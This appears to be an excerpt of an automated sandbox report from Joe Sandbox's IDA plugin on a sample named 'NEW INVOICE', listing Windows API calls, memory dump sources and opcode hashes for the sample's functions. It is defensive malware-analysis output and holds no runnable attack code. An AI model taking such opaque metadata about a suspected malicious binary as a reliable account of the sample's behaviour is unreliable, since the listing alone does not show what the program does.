                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1352109105-0
                                                                                    • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                    • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                    • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                    • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                    • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                    • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                    • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                    • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                    APIs
                                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                    • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 3321077145-0
                                                                                    • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                    • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                    • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                    • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 004505BF
                                                                                    • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                    • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                    • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Proc$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 2351499541-0
                                                                                    • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                    • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                    • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                    • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                    APIs
                                                                                      • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                    • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                    • __itow.LIBCMT ref: 00461461
                                                                                    • __itow.LIBCMT ref: 004614AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2875217250-0
                                                                                    • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                    • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                    • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                    • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0040E202
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell__memset
                                                                                    • String ID:
                                                                                    • API String ID: 928536360-0
                                                                                    • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                    • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                    • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                    • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00472806
                                                                                      • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                      • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                      • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                    • GetCaretPos.USER32(?), ref: 0047281A
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                    • GetForegroundWindow.USER32 ref: 0047285C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                    • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                    • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                    • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                    APIs
                                                                                      • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                    • String ID:
                                                                                    • API String ID: 2169480361-0
                                                                                    • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                    • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                    • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                    • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                    APIs
                                                                                    • SendMessageW.USER32 ref: 00448CB8
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 312131281-0
                                                                                    • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                    • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                    • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                    • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                    APIs
                                                                                    • select.WSOCK32 ref: 0045890A
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                    • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastacceptselect
                                                                                    • String ID:
                                                                                    • API String ID: 385091864-0
                                                                                    • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                    • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                    • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                    • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                    • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                    • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                    • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                    • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                                                    • String ID:
                                                                                    • API String ID: 1358664141-0
                                                                                    • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                    • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                    • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                    • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2880819207-0
                                                                                    • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                    • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                    • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                    • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                    • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                    • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                    • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 357397906-0
                                                                                    • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                    • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                    • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                    • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                    • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                    • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                                    APIs
                                                                                    • __wsplitpath.LIBCMT ref: 00436A45
                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                    • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                    • __wcsicoll.LIBCMT ref: 00436A93
                                                                                    • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                    • String ID:
                                                                                    • API String ID: 1187119602-0
                                                                                    • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                    • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                    • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                    • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1597257046-0
                                                                                    • Opcode ID: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
                                                                                    • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                    • Opcode Fuzzy Hash: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
                                                                                    • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                    APIs
